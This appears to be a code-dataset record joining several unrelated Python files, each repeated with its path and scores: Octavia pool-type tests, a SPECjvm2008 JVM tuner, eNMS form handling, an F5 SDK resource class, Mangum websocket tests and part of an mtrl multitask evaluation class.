"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": "source_ip"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_non_uuid_project_id(self):
body = {"loadbalancer_id": uuidutils.generate_uuid(),
"protocol": constants.PROTOCOL_HTTP,
"lb_algorithm": constants.LB_ALGORITHM_ROUND_ROBIN,
"project_id": "non-uuid"}
pool = wsme_json.fromjson(self._type, body)
self.assertEqual(pool.project_id, body['project_id'])
class TestPoolPUT(base.BaseTypesTest):
_type = pool_type.PoolPUT
def test_pool(self):
body = {"name": "test_name"}
pool = wsme_json.fromjson(self._type, body)
self.assertEqual(wsme_types.Unset, pool.admin_state_up)
def test_invalid_name(self):
body = {"name": 10}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_name(self):
body = {"name": "n" * 256}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_too_long_description(self):
body = {"description": "d" * 256}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_description(self):
body = {"description": 10}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
def test_invalid_lb_algorithm(self):
body = {"lb_algorithm": "source_ip"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
class TestSessionPersistencePOST(base.BaseTypesTest, TestSessionPersistence):
_type = pool_type.SessionPersistencePOST
def test_type_mandatory(self):
body = {"cookie_name": "test_name"}
self.assertRaises(exc.InvalidInput, wsme_json.fromjson, self._type,
body)
class TestSessionPersistencePUT(base.BaseTypesTest, TestSessionPersistence):
_type = pool_type.SessionPersistencePUT | 0.411584 | 0.179028 |
import argparse
import re
import jvmtunerInterface
from jvmtunerInterface import JvmFlagsTunerInterface
argparser = argparse.ArgumentParser(parents=[jvmtunerInterface.argparser])
argparser.add_argument(
'--jvm_spec_startup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false --jvmArgs "{Opt_flags}"',
help='command template to JVMSPEC2008 statup program tuning.. ')
argparser.add_argument(
'--jvm_spec_nonstartup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false -wt 30s -it 30s --jvmArgs "{Opt_flags}"',
help='command template to JVMSPEC2008 nonstatup program tuning.. ')
argparser.add_argument('--spec_type', help='Select between startup and non_startup', default='startup')
class SpecJvmTuner(JvmFlagsTunerInterface):
def __init__(self, *pargs, **kwargs):
super(SpecJvmTuner, self).__init__(args, *pargs,
**kwargs)
def execute_program(self):
temp_metric=0
for i in range(0,int(args.iterations)):
print 'running iteration '+str(i)
if(args.spec_type == 'startup'):
run_result = self.call_program(args.jvm_spec_startup.format(source=args.source,Opt_flags=self.flags))
elif(args.spec_type == 'non_startup'):
run_result = self.call_program(args.jvm_spec_nonstartup.format(source=args.source,Opt_flags=self.flags))
temp_metric=temp_metric+self.get_ms_per_op_jvm(run_result['stdout'])
temp_metric=float(temp_metric/int(args.iterations))
return temp_metric
def get_ms_per_op_jvm(self,result):
m=re.search('Score on '+str(args.source)+': [0-9]*.[0-9]*|Score on '+str(args.source)+': [0-9]*',result,flags=re.DOTALL)
ops_m=1
if m:
ops_m=m.group(0)
ops_m =re.sub('Score on '+str(args.source)+': ','',ops_m)
ops_m = re.sub(' ops/m','',ops_m)
try:
ops_m=float(ops_m)
except:
ops_m=1
time_per_op=6000.0/ops_m
return time_per_op
if __name__ == '__main__':
args = argparser.parse_args()
SpecJvmTuner.main(args) | Hotspot_JVM_Tuner/src/specjvmTuner.py | import argparse
import re
import jvmtunerInterface
from jvmtunerInterface import JvmFlagsTunerInterface
argparser = argparse.ArgumentParser(parents=[jvmtunerInterface.argparser])
argparser.add_argument(
'--jvm_spec_startup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false --jvmArgs "{Opt_flags}"',
help='command template to JVMSPEC2008 statup program tuning.. ')
argparser.add_argument(
'--jvm_spec_nonstartup', default='java -jar SPECjvm2008.jar {source} -ikv -crf false -wt 30s -it 30s --jvmArgs "{Opt_flags}"',
help='command template to JVMSPEC2008 nonstatup program tuning.. ')
argparser.add_argument('--spec_type', help='Select between startup and non_startup', default='startup')
class SpecJvmTuner(JvmFlagsTunerInterface):
def __init__(self, *pargs, **kwargs):
super(SpecJvmTuner, self).__init__(args, *pargs,
**kwargs)
def execute_program(self):
temp_metric=0
for i in range(0,int(args.iterations)):
print 'running iteration '+str(i)
if(args.spec_type == 'startup'):
run_result = self.call_program(args.jvm_spec_startup.format(source=args.source,Opt_flags=self.flags))
elif(args.spec_type == 'non_startup'):
run_result = self.call_program(args.jvm_spec_nonstartup.format(source=args.source,Opt_flags=self.flags))
temp_metric=temp_metric+self.get_ms_per_op_jvm(run_result['stdout'])
temp_metric=float(temp_metric/int(args.iterations))
return temp_metric
def get_ms_per_op_jvm(self,result):
m=re.search('Score on '+str(args.source)+': [0-9]*.[0-9]*|Score on '+str(args.source)+': [0-9]*',result,flags=re.DOTALL)
ops_m=1
if m:
ops_m=m.group(0)
ops_m =re.sub('Score on '+str(args.source)+': ','',ops_m)
ops_m = re.sub(' ops/m','',ops_m)
try:
ops_m=float(ops_m)
except:
ops_m=1
time_per_op=6000.0/ops_m
return time_per_op
if __name__ == '__main__':
args = argparser.parse_args()
SpecJvmTuner.main(args) | 0.276984 | 0.065755 |
from collections import defaultdict
from flask import request
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms.fields.core import UnboundField
from wtforms.form import FormMeta
from eNMS import app
from eNMS.database import db
from eNMS.forms.fields import (
BooleanField,
DictField,
InstanceField,
IntegerField,
JsonField,
MultipleInstanceField,
PasswordField,
StringField,
)
from eNMS.models import property_types, relationships
form_actions = {}
form_classes = {}
form_properties = defaultdict(dict)
form_templates = {}
class MetaForm(FormMeta):
def __new__(cls, name, bases, attrs):
if name == "BaseForm":
return type.__new__(cls, name, bases, attrs)
form_type = attrs["form_type"].kwargs["default"]
form = type.__new__(cls, name, bases, attrs)
if not hasattr(form, "custom_properties"):
form.custom_properties = {}
form.custom_properties.update(app.properties["custom"].get(form_type, {}))
for property, values in form.custom_properties.items():
if not values.get("form", True):
continue
if property in db.private_properties:
field = PasswordField
else:
field = {
"boolean": BooleanField,
"dict": DictField,
"integer": IntegerField,
"json": JsonField,
"string": StringField,
}[values.get("type", "string")]
form_kw = {"default": values["default"]} if "default" in values else {}
field = field(values["pretty_name"], **form_kw)
setattr(form, property, field)
attrs[property] = field
form_classes[form_type] = form
form_templates[form_type] = getattr(form, "template", "base")
form_actions[form_type] = getattr(form, "action", None)
properties = {}
for field_name, field in attrs.items():
if not isinstance(field, UnboundField):
continue
field_type = field.kwargs.pop("type", None)
if not field_type:
field_type = field.field_class.type
properties[field_name] = {
"type": field_type,
"model": field.kwargs.pop("model", None),
}
if field.args and isinstance(field.args[0], str):
app.property_names[field_name] = field.args[0]
if (
issubclass(field.field_class, PasswordField)
and field_name not in db.private_properties
):
db.private_properties.append(field_name)
form_properties[form_type].update(properties)
for property, value in properties.items():
if property not in property_types and value["type"] != "field-list":
property_types[property] = value["type"]
for base in form.__bases__:
if not hasattr(base, "form_type"):
continue
base_form_type = base.form_type.kwargs["default"]
form.custom_properties.update(base.custom_properties)
if base_form_type == "service":
form.service_fields = [
property
for property in properties
if property not in form.custom_properties
]
if getattr(base, "abstract_service", False):
form.service_fields.extend(form_properties[base_form_type])
form_properties[form_type].update(form_properties[base_form_type])
return form
class BaseForm(FlaskForm, metaclass=MetaForm):
pass
def form_postprocessing(form, form_data):
data = {**form_data.to_dict(), **{"user": current_user}}
if request.files:
data["file"] = request.files["file"]
for property, field in form_properties[form_data.get("form_type")].items():
if field["type"] in ("object-list", "multiselect", "multiselect-string"):
value = form_data.getlist(property)
if field["type"] == "multiselect-string":
value = str(value)
data[property] = value
elif field["type"] == "object":
data[property] = form_data.get(property)
elif field["type"] == "field-list":
data[property] = []
for entry in getattr(form, property).entries:
properties = entry.data
properties.pop("csrf_token")
data[property].append(properties)
elif field["type"] == "bool":
data[property] = property in form_data
elif field["type"] in db.field_conversion and property in data:
data[property] = db.field_conversion[field["type"]](form_data[property])
return data
def choices(iterable):
return [(choice, choice) for choice in iterable]
def configure_relationships(*models):
def configure_class_relationships(cls):
form_type = cls.form_type.kwargs["default"]
for related_model, relation in relationships[form_type].items():
if related_model not in models:
continue
field = MultipleInstanceField if relation["list"] else InstanceField
field_type = "object-list" if relation["list"] else "object"
form_properties[form_type][related_model] = {"type": field_type}
setattr(cls, related_model, field())
return configure_class_relationships | eNMS/forms/__init__.py | from collections import defaultdict
from flask import request
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms.fields.core import UnboundField
from wtforms.form import FormMeta
from eNMS import app
from eNMS.database import db
from eNMS.forms.fields import (
BooleanField,
DictField,
InstanceField,
IntegerField,
JsonField,
MultipleInstanceField,
PasswordField,
StringField,
)
from eNMS.models import property_types, relationships
form_actions = {}
form_classes = {}
form_properties = defaultdict(dict)
form_templates = {}
class MetaForm(FormMeta):
def __new__(cls, name, bases, attrs):
if name == "BaseForm":
return type.__new__(cls, name, bases, attrs)
form_type = attrs["form_type"].kwargs["default"]
form = type.__new__(cls, name, bases, attrs)
if not hasattr(form, "custom_properties"):
form.custom_properties = {}
form.custom_properties.update(app.properties["custom"].get(form_type, {}))
for property, values in form.custom_properties.items():
if not values.get("form", True):
continue
if property in db.private_properties:
field = PasswordField
else:
field = {
"boolean": BooleanField,
"dict": DictField,
"integer": IntegerField,
"json": JsonField,
"string": StringField,
}[values.get("type", "string")]
form_kw = {"default": values["default"]} if "default" in values else {}
field = field(values["pretty_name"], **form_kw)
setattr(form, property, field)
attrs[property] = field
form_classes[form_type] = form
form_templates[form_type] = getattr(form, "template", "base")
form_actions[form_type] = getattr(form, "action", None)
properties = {}
for field_name, field in attrs.items():
if not isinstance(field, UnboundField):
continue
field_type = field.kwargs.pop("type", None)
if not field_type:
field_type = field.field_class.type
properties[field_name] = {
"type": field_type,
"model": field.kwargs.pop("model", None),
}
if field.args and isinstance(field.args[0], str):
app.property_names[field_name] = field.args[0]
if (
issubclass(field.field_class, PasswordField)
and field_name not in db.private_properties
):
db.private_properties.append(field_name)
form_properties[form_type].update(properties)
for property, value in properties.items():
if property not in property_types and value["type"] != "field-list":
property_types[property] = value["type"]
for base in form.__bases__:
if not hasattr(base, "form_type"):
continue
base_form_type = base.form_type.kwargs["default"]
form.custom_properties.update(base.custom_properties)
if base_form_type == "service":
form.service_fields = [
property
for property in properties
if property not in form.custom_properties
]
if getattr(base, "abstract_service", False):
form.service_fields.extend(form_properties[base_form_type])
form_properties[form_type].update(form_properties[base_form_type])
return form
class BaseForm(FlaskForm, metaclass=MetaForm):
pass
def form_postprocessing(form, form_data):
data = {**form_data.to_dict(), **{"user": current_user}}
if request.files:
data["file"] = request.files["file"]
for property, field in form_properties[form_data.get("form_type")].items():
if field["type"] in ("object-list", "multiselect", "multiselect-string"):
value = form_data.getlist(property)
if field["type"] == "multiselect-string":
value = str(value)
data[property] = value
elif field["type"] == "object":
data[property] = form_data.get(property)
elif field["type"] == "field-list":
data[property] = []
for entry in getattr(form, property).entries:
properties = entry.data
properties.pop("csrf_token")
data[property].append(properties)
elif field["type"] == "bool":
data[property] = property in form_data
elif field["type"] in db.field_conversion and property in data:
data[property] = db.field_conversion[field["type"]](form_data[property])
return data
def choices(iterable):
return [(choice, choice) for choice in iterable]
def configure_relationships(*models):
def configure_class_relationships(cls):
form_type = cls.form_type.kwargs["default"]
for related_model, relation in relationships[form_type].items():
if related_model not in models:
continue
field = MultipleInstanceField if relation["list"] else InstanceField
field_type = "object-list" if relation["list"] else "object"
form_properties[form_type][related_model] = {"type": field_type}
setattr(cls, related_model, field())
return configure_class_relationships | 0.480722 | 0.09739 |
from f5.bigip.resource import Collection as BigIpCollection
from f5.bigip.resource import HTTPError
from f5.bigip.resource import OrganizingCollection as BigIpOrganizingCollection
from f5.bigip.resource import PathElement as BigIpPathElement
from f5.bigip.resource import Resource as BigIpResource
from f5.bigip.resource import ResourceBase as BigIpResourceBase
from f5.bigip.resource import UnnamedResource as BigIpUnnamedResource
from f5.sdk_exception import UnsupportedOperation
from f5.sdk_exception import URICreationCollision
class PathElement(BigIpPathElement):
"""Base class to represent a URI path element that does not contain data.
The BIG-IP® iControl REST API has URIs that are made up of path components
that do not return data when they are queried. This class represents
those elements and does not support any of the CURDLE methods that
the other objects do.
"""
def __init__(self, container):
super(PathElement, self).__init__(container)
self._meta_data['minimum_version'] = '5.3.0'
class Resource(BigIpResource, PathElement):
def __init__(self, container):
super(Resource, self).__init__(container)
self._meta_data['required_load_parameters'] = {'id', }
class ResourceBase(BigIpResourceBase, PathElement):
pass
class OrganizingCollection(BigIpOrganizingCollection, ResourceBase):
pass
class UnnamedResource(BigIpUnnamedResource, ResourceBase):
pass
class Collection(BigIpCollection, ResourceBase):
pass
class TaskResource(Resource):
def __init__(self, container):
"""Call to create a client side object to represent a service URI.
Call _create or _load for a Resource to have a self._meta_data['uri']!
"""
super(TaskResource, self).__init__(container)
# Asm endpoints require object 'id' which is a hash created by BIGIP
# when object is created.
self._meta_data['required_load_parameters'] = {'id', }
# No ASM endpoint supports Stats
self._meta_data['object_has_stats'] = False
def _load(self, **kwargs):
"""wrapped with load, override that in a subclass to customize"""
if 'uri' in self._meta_data:
error = "There was an attempt to assign a new uri to this " \
"resource, the _meta_data['uri'] is %s and it should" \
" not be changed." % (self._meta_data['uri'])
raise URICreationCollision(error)
requests_params = self._handle_requests_params(kwargs)
self._check_load_parameters(**kwargs)
kwargs['uri_as_parts'] = True
refresh_session = self._meta_data['bigip']._meta_data['icr_session']
uri = self._meta_data['container']._meta_data['uri']
endpoint = kwargs.pop('id', '')
# Popping name kwarg as it will cause the uri to be invalid. We only
# require id parameter
kwargs.pop('name', '')
base_uri = uri + endpoint + '/'
kwargs.update(requests_params)
for key1, key2 in self._meta_data['reduction_forcing_pairs']:
kwargs = self._reduce_boolean_pair(kwargs, key1, key2)
response = refresh_session.get(base_uri, **kwargs)
# Make new instance of self
return self._produce_instance(response)
def load(self, **kwargs):
"""Load an already configured service into this instance.
This method uses HTTP GET to obtain a resource from the BIG-IP®.
..
The URI of the target service is constructed from the instance's
container and **kwargs.
kwargs typically for ASM requires "id" in majority of cases,
as object links in ASM are using hash(id) instead of names,
this may, or may not, be true for a specific service.
:param kwargs: typically contains "id"
NOTE: If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.get method where it will
be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
:returns: a Resource Instance (with a populated _meta_data['uri'])
"""
return self._load(**kwargs)
def _delete(self, **kwargs):
"""wrapped with delete, override that in a subclass to customize """
requests_params = self._handle_requests_params(kwargs)
delete_uri = self._meta_data['uri']
session = self._meta_data['bigip']._meta_data['icr_session']
response = session.delete(delete_uri, **requests_params)
if response.status_code == 200 or 201:
self.__dict__ = {'deleted': True}
def delete(self, **kwargs):
"""Delete the Task resource on the BIG-IP®.
Uses HTTP DELETE to delete the Task resource on the BIG-IP®.
After this method is called, and status_code 200 or 201 response is
received ``instance.__dict__`` is replace with ``{'deleted': True}``
:param kwargs: The only current use is to pass kwargs to the requests
API. If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.delete method where it
will be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
"""
# Need to implement checking for ? here.
self._delete(**kwargs)
# Need to implement correct teardown here.
def exists(self, **kwargs):
"""Check for the existence of the Task object on the BIG-IP
Sends an HTTP GET to the URI of the ASM object and if it fails with
a :exc:~requests.HTTPError` exception it checks the exception for
status code of 404 and returns :obj:`False` in that case.
If the GET is successful it returns :obj:`True`.
For any other errors are raised as-is.
:param kwargs: Keyword arguments required to get objects
NOTE: If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.get method where it will
be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
:returns: bool -- The objects exists on BIG-IP® or not.
:raises: :exc:`requests.HTTPError`, Any HTTP error that was not status
code 404.
"""
requests_params = self._handle_requests_params(kwargs)
self._check_load_parameters(**kwargs)
kwargs['uri_as_parts'] = True
session = self._meta_data['bigip']._meta_data['icr_session']
uri = self._meta_data['container']._meta_data['uri']
endpoint = kwargs.pop('id', '')
# Popping name kwarg as it will cause the uri to be invalid
kwargs.pop('name', '')
base_uri = uri + endpoint + '/'
kwargs.update(requests_params)
try:
session.get(base_uri, **kwargs)
except HTTPError as err:
if err.response.status_code == 404:
return False
else:
raise
return True
def update(self, **kwargs):
"""Update is not supported for ASM Resources
:raises: UnsupportedOperation
"""
raise UnsupportedOperation(
"%s does not support the update method" % self.__class__.__name__
) | f5/bigiq/resource.py |
from f5.bigip.resource import Collection as BigIpCollection
from f5.bigip.resource import HTTPError
from f5.bigip.resource import OrganizingCollection as BigIpOrganizingCollection
from f5.bigip.resource import PathElement as BigIpPathElement
from f5.bigip.resource import Resource as BigIpResource
from f5.bigip.resource import ResourceBase as BigIpResourceBase
from f5.bigip.resource import UnnamedResource as BigIpUnnamedResource
from f5.sdk_exception import UnsupportedOperation
from f5.sdk_exception import URICreationCollision
class PathElement(BigIpPathElement):
"""Base class to represent a URI path element that does not contain data.
The BIG-IP® iControl REST API has URIs that are made up of path components
that do not return data when they are queried. This class represents
those elements and does not support any of the CURDLE methods that
the other objects do.
"""
def __init__(self, container):
super(PathElement, self).__init__(container)
self._meta_data['minimum_version'] = '5.3.0'
class Resource(BigIpResource, PathElement):
def __init__(self, container):
super(Resource, self).__init__(container)
self._meta_data['required_load_parameters'] = {'id', }
class ResourceBase(BigIpResourceBase, PathElement):
pass
class OrganizingCollection(BigIpOrganizingCollection, ResourceBase):
pass
class UnnamedResource(BigIpUnnamedResource, ResourceBase):
pass
class Collection(BigIpCollection, ResourceBase):
pass
class TaskResource(Resource):
def __init__(self, container):
"""Call to create a client side object to represent a service URI.
Call _create or _load for a Resource to have a self._meta_data['uri']!
"""
super(TaskResource, self).__init__(container)
# Asm endpoints require object 'id' which is a hash created by BIGIP
# when object is created.
self._meta_data['required_load_parameters'] = {'id', }
# No ASM endpoint supports Stats
self._meta_data['object_has_stats'] = False
def _load(self, **kwargs):
"""wrapped with load, override that in a subclass to customize"""
if 'uri' in self._meta_data:
error = "There was an attempt to assign a new uri to this " \
"resource, the _meta_data['uri'] is %s and it should" \
" not be changed." % (self._meta_data['uri'])
raise URICreationCollision(error)
requests_params = self._handle_requests_params(kwargs)
self._check_load_parameters(**kwargs)
kwargs['uri_as_parts'] = True
refresh_session = self._meta_data['bigip']._meta_data['icr_session']
uri = self._meta_data['container']._meta_data['uri']
endpoint = kwargs.pop('id', '')
# Popping name kwarg as it will cause the uri to be invalid. We only
# require id parameter
kwargs.pop('name', '')
base_uri = uri + endpoint + '/'
kwargs.update(requests_params)
for key1, key2 in self._meta_data['reduction_forcing_pairs']:
kwargs = self._reduce_boolean_pair(kwargs, key1, key2)
response = refresh_session.get(base_uri, **kwargs)
# Make new instance of self
return self._produce_instance(response)
def load(self, **kwargs):
"""Load an already configured service into this instance.
This method uses HTTP GET to obtain a resource from the BIG-IP®.
..
The URI of the target service is constructed from the instance's
container and **kwargs.
kwargs typically for ASM requires "id" in majority of cases,
as object links in ASM are using hash(id) instead of names,
this may, or may not, be true for a specific service.
:param kwargs: typically contains "id"
NOTE: If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.get method where it will
be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
:returns: a Resource Instance (with a populated _meta_data['uri'])
"""
return self._load(**kwargs)
def _delete(self, **kwargs):
"""wrapped with delete, override that in a subclass to customize """
requests_params = self._handle_requests_params(kwargs)
delete_uri = self._meta_data['uri']
session = self._meta_data['bigip']._meta_data['icr_session']
response = session.delete(delete_uri, **requests_params)
if response.status_code == 200 or 201:
self.__dict__ = {'deleted': True}
def delete(self, **kwargs):
"""Delete the Task resource on the BIG-IP®.
Uses HTTP DELETE to delete the Task resource on the BIG-IP®.
After this method is called, and status_code 200 or 201 response is
received ``instance.__dict__`` is replace with ``{'deleted': True}``
:param kwargs: The only current use is to pass kwargs to the requests
API. If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.delete method where it
will be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
"""
# Need to implement checking for ? here.
self._delete(**kwargs)
# Need to implement correct teardown here.
def exists(self, **kwargs):
"""Check for the existence of the Task object on the BIG-IP
Sends an HTTP GET to the URI of the ASM object and if it fails with
a :exc:~requests.HTTPError` exception it checks the exception for
status code of 404 and returns :obj:`False` in that case.
If the GET is successful it returns :obj:`True`.
For any other errors are raised as-is.
:param kwargs: Keyword arguments required to get objects
NOTE: If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.get method where it will
be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
:returns: bool -- The objects exists on BIG-IP® or not.
:raises: :exc:`requests.HTTPError`, Any HTTP error that was not status
code 404.
"""
requests_params = self._handle_requests_params(kwargs)
self._check_load_parameters(**kwargs)
kwargs['uri_as_parts'] = True
session = self._meta_data['bigip']._meta_data['icr_session']
uri = self._meta_data['container']._meta_data['uri']
endpoint = kwargs.pop('id', '')
# Popping name kwarg as it will cause the uri to be invalid
kwargs.pop('name', '')
base_uri = uri + endpoint + '/'
kwargs.update(requests_params)
try:
session.get(base_uri, **kwargs)
except HTTPError as err:
if err.response.status_code == 404:
return False
else:
raise
return True
def update(self, **kwargs):
"""Update is not supported for ASM Resources
:raises: UnsupportedOperation
"""
raise UnsupportedOperation(
"%s does not support the update method" % self.__class__.__name__
) | 0.833968 | 0.154983 |
import mock
from mangum import Mangum
def test_websocket_close(tmp_path, mock_ws_connect_event, mock_ws_send_event) -> None:
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
async def app(scope, receive, send):
if scope["type"] == "websocket":
while True:
message = await receive()
if message["type"] == "websocket.connect":
await send({"type": "websocket.close"})
handler = Mangum(app, dsn=dsn)
response = handler(mock_ws_connect_event, {})
assert response == {"statusCode": 200}
with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
send.return_value = None
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 403}
def test_websocket_disconnect(
tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(mock_websocket_app, dsn=dsn)
response = handler(mock_ws_connect_event, {})
assert response == {"statusCode": 200}
with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
send.return_value = None
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 200}
def test_websocket_exception(
tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
async def app(scope, receive, send):
raise Exception()
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(app, dsn=dsn)
handler(mock_ws_connect_event, {})
handler = Mangum(app, dsn=dsn)
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 500}
def test_websocket_unexpected_message_error(
tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
async def app(scope, receive, send):
await send({"type": "websocket.oops", "subprotocol": None})
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(app, dsn=dsn)
handler(mock_ws_connect_event, {})
handler = Mangum(app, dsn=dsn)
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 500}
def test_websocket_without_body(
tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(mock_websocket_app, dsn=dsn)
response = handler(mock_ws_connect_event, {})
assert response == {"statusCode": 200}
with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
send.return_value = None
del mock_ws_send_event["body"]
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 200} | tests/test_websockets.py | import mock
from mangum import Mangum
def test_websocket_close(tmp_path, mock_ws_connect_event, mock_ws_send_event) -> None:
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
async def app(scope, receive, send):
if scope["type"] == "websocket":
while True:
message = await receive()
if message["type"] == "websocket.connect":
await send({"type": "websocket.close"})
handler = Mangum(app, dsn=dsn)
response = handler(mock_ws_connect_event, {})
assert response == {"statusCode": 200}
with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
send.return_value = None
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 403}
def test_websocket_disconnect(
tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(mock_websocket_app, dsn=dsn)
response = handler(mock_ws_connect_event, {})
assert response == {"statusCode": 200}
with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
send.return_value = None
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 200}
def test_websocket_exception(
tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
async def app(scope, receive, send):
raise Exception()
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(app, dsn=dsn)
handler(mock_ws_connect_event, {})
handler = Mangum(app, dsn=dsn)
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 500}
def test_websocket_unexpected_message_error(
tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
async def app(scope, receive, send):
await send({"type": "websocket.oops", "subprotocol": None})
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(app, dsn=dsn)
handler(mock_ws_connect_event, {})
handler = Mangum(app, dsn=dsn)
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 500}
def test_websocket_without_body(
tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
handler = Mangum(mock_websocket_app, dsn=dsn)
response = handler(mock_ws_connect_event, {})
assert response == {"statusCode": 200}
with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
send.return_value = None
del mock_ws_send_event["body"]
response = handler(mock_ws_send_event, {})
assert response == {"statusCode": 200} | 0.394667 | 0.196325 |
"""Class to interface with an Experiment"""
from typing import List
import numpy as np
from mtenv.utils.types import ObsType
from mtrl.agent import utils as agent_utils
from mtrl.env.vec_env import VecEnv # type: ignore[attr-defined]
from mtrl.experiment import multitask
from mtrl.utils.types import ConfigType, TensorType
class Experiment(multitask.Experiment):
def __init__(self, config: ConfigType, experiment_id: str = "0"):
"""Experiment Class to manage the lifecycle of a multi-task model.
Args:
config (ConfigType):
experiment_id (str, optional): Defaults to "0".
"""
super().__init__(config, experiment_id)
def get_action_when_evaluating_vec_env_of_tasks(
self, multitask_obs: ObsType, modes: List[str]
) -> TensorType:
agent = self.agent
with agent_utils.eval_mode(agent):
action = agent.select_action(multitask_obs=multitask_obs, modes=modes)
return action
def evaluate_vec_env_of_tasks(self, vec_env: VecEnv, step: int, episode: int):
"""Evaluate the agent's performance on the different environments,
vectorized as a single instance of vectorized environment.
Since we are evaluating on multiple tasks, we track additional metadata
to track which metric corresponds to which task.
Args:
vec_env (VecEnv): vectorized environment.
step (int): step for tracking the training of the agent.
episode (int): episode for tracking the training of the agent.
"""
for mode in self.eval_modes_to_env_ids:
self.logger.log(f"{mode}/episode", episode, step)
episode_reward, mask, done = [
np.full(shape=vec_env.num_envs, fill_value=fill_value)
for fill_value in [0.0, 1.0, False]
] # (num_envs, 1)
multitask_obs = vec_env.reset() # (num_envs, 9, 84, 84)
offset = self.config.experiment.num_eval_episodes
while not np.all(done):
action = self.get_action_when_evaluating_vec_env_of_tasks(
multitask_obs=multitask_obs, modes=vec_env.mode
)
multitask_obs, reward, done, _ = vec_env.step(action)
mask = mask * (1 - done.astype(int))
episode_reward += reward * mask
start_index = 0
for mode in self.eval_modes_to_env_ids:
num_envs = len(self.eval_modes_to_env_ids[mode])
self.logger.log(
f"{mode}/episode_reward",
episode_reward[start_index : start_index + offset * num_envs].mean(),
step,
)
for _current_env_index, _current_env_id in enumerate(
self.eval_modes_to_env_ids[mode]
):
self.logger.log(
f"{mode}/episode_reward_env_index_{_current_env_index}",
episode_reward[
start_index
+ _current_env_index * offset : start_index
+ (_current_env_index + 1) * offset
].mean(),
step,
)
self.logger.log(
f"{mode}/env_index_{_current_env_index}", _current_env_id, step
)
start_index += offset * num_envs
self.logger.dump(step) | src/mtrl/experiment/dmcontrol.py | """Class to interface with an Experiment"""
from typing import List
import numpy as np
from mtenv.utils.types import ObsType
from mtrl.agent import utils as agent_utils
from mtrl.env.vec_env import VecEnv # type: ignore[attr-defined]
from mtrl.experiment import multitask
from mtrl.utils.types import ConfigType, TensorType
class Experiment(multitask.Experiment):
def __init__(self, config: ConfigType, experiment_id: str = "0"):
"""Experiment Class to manage the lifecycle of a multi-task model.
Args:
config (ConfigType):
experiment_id (str, optional): Defaults to "0".
"""
super().__init__(config, experiment_id)
def get_action_when_evaluating_vec_env_of_tasks(
self, multitask_obs: ObsType, modes: List[str]
) -> TensorType:
agent = self.agent
with agent_utils.eval_mode(agent):
action = agent.select_action(multitask_obs=multitask_obs, modes=modes)
return action
def evaluate_vec_env_of_tasks(self, vec_env: VecEnv, step: int, episode: int):
"""Evaluate the agent's performance on the different environments,
vectorized as a single instance of vectorized environment.
Since we are evaluating on multiple tasks, we track additional metadata
to track which metric corresponds to which task.
Args:
vec_env (VecEnv): vectorized environment.
step (int): step for tracking the training of the agent.
episode (int): episode for tracking the training of the agent.
"""
for mode in self.eval_modes_to_env_ids:
self.logger.log(f"{mode}/episode", episode, step)
episode_reward, mask, done = [
np.full(shape=vec_env.num_envs, fill_value=fill_value)
for fill_value in [0.0, 1.0, False]
] # (num_envs, 1)
